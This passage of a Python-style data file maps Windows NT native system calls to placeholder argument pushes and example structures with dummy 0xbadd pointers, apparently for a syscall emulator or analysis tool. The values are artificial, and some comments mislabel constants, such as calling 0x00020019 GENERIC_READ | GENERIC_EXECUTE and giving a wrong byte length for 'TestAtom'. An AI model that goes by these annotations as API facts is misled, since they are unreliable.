\"0xbadd01a0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct12\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd01b0\",\r\n \"additionalComment\": \"Pointer to HandleId (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd01c0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct13\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct8\": {\r\n \"type\": \"GENERIC_MAPPING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GenericRead\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x80000000\",\r\n \"fieldComment\": \"GENERIC_READ\"\r\n },\r\n {\r\n \"fieldName\": \"GenericWrite\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x40000000\",\r\n \"fieldComment\": \"GENERIC_WRITE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericExecute\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"GENERIC_EXECUTE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericAll\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"GENERIC_ALL\"\r\n }\r\n ]\r\n },\r\n \"struct9\": {\r\n \"type\": \"OBJECT_TYPE_LIST\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Level\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Object type level\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"POINTER\",\r\n \"fieldValue\": \"0xbadd0300\",\r\n \"fieldComment\": \"Pointer to object type GUID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct10\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SECURITY_DESCRIPTOR_REVISION\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0310\",\r\n \"fieldComment\": \"Pointer to owner SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0320\",\r\n \"fieldComment\": \"Pointer to group SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd0330\",\r\n \"fieldComment\": \"Pointer to DACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct11\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0340\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct12\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0012\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0022\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0350\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct13\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0024\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0360\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": {\r\n \"ntFunc\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd01d0\",\r\n \"additionalComment\": \"Pointer to BOOLEAN GenerateOnClose (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00\"\r\n },\r\n {\r\n \"value\": \"0xbadd01e0\",\r\n \"additionalComment\": \"Pointer to NTSTATUS ReturnStatus (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd01f0\",\r\n \"additionalComment\": \"Pointer to ACCESS_MASK GrantedAccess (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00\",\r\n \"additionalComment\": \"BOOLEAN ObjectCreation (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0200\",\r\n \"additionalComment\": \"Pointer to GENERIC_MAPPING (dummy pointer)\",\r\n \"structurePointer\": \"GENERIC_MAPPING\",\r\n \"structureRef\": \"struct8\",\r\n \"structureValueExpectations\": \"GenericRead, GenericWrite, GenericExecute, GenericAll masks.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ObjectTypeListLength (single object type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0210\",\r\n \"additionalComment\": \"Pointer to OBJECT_TYPE_LIST (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_TYPE_LIST\",\r\n \"structureRef\": \"struct9\",\r\n \"structureValueExpectations\": \"Level, Sbz, Type pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (no flags set)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"AUDIT_EVENT_TYPE AuditType (ObjectAccess)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0220\",\r\n \"additionalComment\": \"Pointer to SID PrincipalSelfSid (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x01020300\"\r\n },\r\n {\r\n \"value\": \"0xbadd0230\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct10\",\r\n \"structureValueExpectations\": \"Revision, Control, Owner, Group, SACL, DACL.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0240\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct11\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0250\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct12\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ClientToken (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0260\",\r\n \"additionalComment\": \"Pointer to HandleId (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0270\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct13\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct8\": {\r\n \"type\": \"GENERIC_MAPPING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GenericRead\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x80000000\",\r\n \"fieldComment\": \"GENERIC_READ\"\r\n },\r\n {\r\n \"fieldName\": \"GenericWrite\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x40000000\",\r\n \"fieldComment\": \"GENERIC_WRITE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericExecute\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"GENERIC_EXECUTE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericAll\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"GENERIC_ALL\"\r\n }\r\n ]\r\n },\r\n \"struct9\": {\r\n \"type\": \"OBJECT_TYPE_LIST\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Level\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Object type level\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"POINTER\",\r\n \"fieldValue\": \"0xbadd0300\",\r\n \"fieldComment\": \"Pointer to object type GUID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct10\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SECURITY_DESCRIPTOR_REVISION\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0310\",\r\n \"fieldComment\": \"Pointer to owner SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0320\",\r\n \"fieldComment\": \"Pointer to group SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd0330\",\r\n \"fieldComment\": \"Pointer to DACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct11\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0340\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct12\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0012\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0022\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0350\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct13\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0024\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0360\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAddAtomEx\": {\r\n \"ntFunc\": \"NtAddAtomEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to RTL_ATOM (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000000C\",\r\n \"additionalComment\": \"Length of AtomName in bytes (example: 12 bytes for 'TestAtom')\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to AtomName (PWSTR, dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd1000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAddBootEntry\": {\r\n \"ntFunc\": \"NtAddBootEntry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to BOOT_ENTRY (dummy pointer)\",\r\n \"structurePointer\": \"BOOT_ENTRY\",\r\n \"structureRef\": \"struct14\",\r\n \"structureValueExpectations\": \"Boot entry structure with identifier, attributes, and file path.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct14\": {\r\n \"type\": \"BOOT_ENTRY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Version\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Version 1\"\r\n },\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000100\",\r\n \"fieldComment\": \"Size of BOOT_ENTRY\"\r\n },\r\n {\r\n \"fieldName\": \"Id\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000010\",\r\n \"fieldComment\": \"Boot entry identifier\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Active attribute\"\r\n },\r\n {\r\n \"fieldName\": \"FriendlyNameOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"Offset to friendly name\"\r\n },\r\n {\r\n \"fieldName\": \"BootFilePathOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000080\",\r\n \"fieldComment\": \"Offset to boot file path\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAddDriverEntry\": {\r\n \"ntFunc\": \"NtAddDriverEntry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to EFI_DRIVER_ENTRY (dummy pointer)\",\r\n \"structurePointer\": \"EFI_DRIVER_ENTRY\",\r\n \"structureRef\": \"struct15\",\r\n \"structureValueExpectations\": \"EFI driver entry structure with version, attributes, and file path.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct15\": {\r\n \"type\": \"EFI_DRIVER_ENTRY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Version\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Version 1\"\r\n },\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000080\",\r\n \"fieldComment\": \"Size of EFI_DRIVER_ENTRY\"\r\n },\r\n {\r\n \"fieldName\": \"Id\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Driver entry identifier\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Active attribute\"\r\n },\r\n {\r\n \"fieldName\": \"FriendlyNameOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Offset to friendly name\"\r\n },\r\n {\r\n \"fieldName\": \"DriverFilePathOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000050\",\r\n \"fieldComment\": \"Offset to driver file path\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAdjustTokenClaimsAndDeviceGroups\": {\r\n \"ntFunc\": \"NtAdjustTokenClaimsAndDeviceGroups\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to TOKEN_GROUPS PreviousDeviceGroups (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DeviceGroupsBufferLength (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousDeviceState (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DeviceBufferLength (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousUserState (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"UserBufferLength (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to TOKEN_GROUPS NewDeviceGroupsState (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION NewDeviceState (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to TOKEN_SECURITY_ATTRIBUTES_INFORMATION NewUserState (optional, None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00\",\r\n \"additionalComment\": \"DeviceGroupsResetToDefault (BOOLEAN, FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00\",\r\n \"additionalComment\": \"DeviceResetToDefault (BOOLEAN, FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00\",\r\n \"additionalComment\": \"UserResetToDefault (BOOLEAN, FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"TokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlertThreadByThreadId\": {\r\n \"ntFunc\": \"NtAlertThreadByThreadId\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001234\",\r\n \"additionalComment\": \"Thread ID (example: 0x1234)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateReserveObject\": {\r\n \"ntFunc\": \"NtAllocateReserveObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"MEMORY_RESERVE_TYPE Type (MemoryReserveObject)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, typical for unnamed reserve objects)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE MemoryReserveHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000444\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetNextProcess\": {\r\n \"ntFunc\": \"NtGetNextProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE NewProcessHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (0, typical for default enumeration)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (PROCESS_QUERY_LIMITED_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, start from None for first call)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetNextThread\": {\r\n \"ntFunc\": \"NtGetNextThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE NewThreadHandle (dummy pointer)\",\r\n 